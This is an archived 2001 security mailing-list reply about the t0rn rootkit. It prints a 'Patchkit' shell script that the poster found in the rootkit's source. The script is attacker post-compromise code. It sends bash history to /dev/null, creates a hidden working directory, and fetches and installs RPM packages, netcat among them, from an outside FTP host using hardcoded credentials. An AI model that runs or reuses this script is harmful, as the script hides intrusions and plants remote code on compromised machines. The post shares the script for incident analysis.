Re: rootkit entertainment

From: tmiller (tmillerat_private)
Date: Wed Jun 06 2001 - 06:05:25 PDT

Next message: Spencer, Ed M. -ND: "RE: Proxy scan"

Previous message: Joris De Donder: "RE: virus- and trojan-portlist"
Maybe in reply to: Alvin Oga: "rootkit entertainment"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I saw this version of t0rn back in feb. The attackers used t666.c to 
exploit the box.

                                          Toby

A patch found in the source....

#!/bin/sh
inf="Patchkit by beast"

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''
 
echo "${GRN}Patching Sequence Started..."
echo "${YEL}Fixing history file in /bin"
echo "${DRED}RE-Initiating bash_history..."
echo "${GRN}Done, linked to /dev/null ;)"
rm -rf /bin/.bash_history
ln -s /dev/null /bin/.bash_history
echo "${DRED}Creating temp path..."
mkdir -p /usr/src/.puta/rpm
echo "${DWHI}*${GRN}-Connected to dumpsite-${DWHI}*"
echo "${DWHI}*************************"
cd /usr/src/.puta/rpm
echo "${DRED}Upgrading WU-FTP, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/wu.rpm
echo "${DRED}Executing WU upgrade...${GRN}"
rpm -Uv wu.rpm
echo "${DRED}Upgrading Statd, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/stat.rpm
echo "${DRED}Executing Statd upgrade...${GRN}"
rpm -Uv stat.rpm
echo "${DRED}Upgrading Vixie, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh 
ftp://ftp.fortunecity.com/help/vixie.rpm
echo "${DRED}Executing Vixie upgrade...${GRN}"
rpm -Uv vixie.rpm
echo "${DRED}Upgrading BIND, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/bind.rpm
echo "${DRED}Executing BIND upgrade...${GRN}"
rpm -Uv bind.rpm
echo "${DRED}Upgrading Imapd, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/imap.rpm
echo "${DRED}Executing Imapd upgrade...${GRN}"
rpm -Uv imap.rpm
echo "${DRED}Upgrading NC, Please hold"
echo "${YEL}Fetching RPM file...${CYN}"
ncftpget -u natas187 -p anpwhsgh ftp://ftp.fortunecity.com/help/nc.rpm
echo "${DRED}Executing NC upgrade...${GRN}"
rpm -Uv nc.rpm
echo "${YEL}Cleaning up old files..."
rm -rf /usr/src/.puta/patch
rm -rf /usr/src/.puta/rpm
echo "${GRN}Patching done${RES}"

Next message: Spencer, Ed M. -ND: "RE: Proxy scan"
Previous message: Joris De Donder: "RE: virus- and trojan-portlist"
Maybe in reply to: Alvin Oga: "rootkit entertainment"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 07:09:52 PDT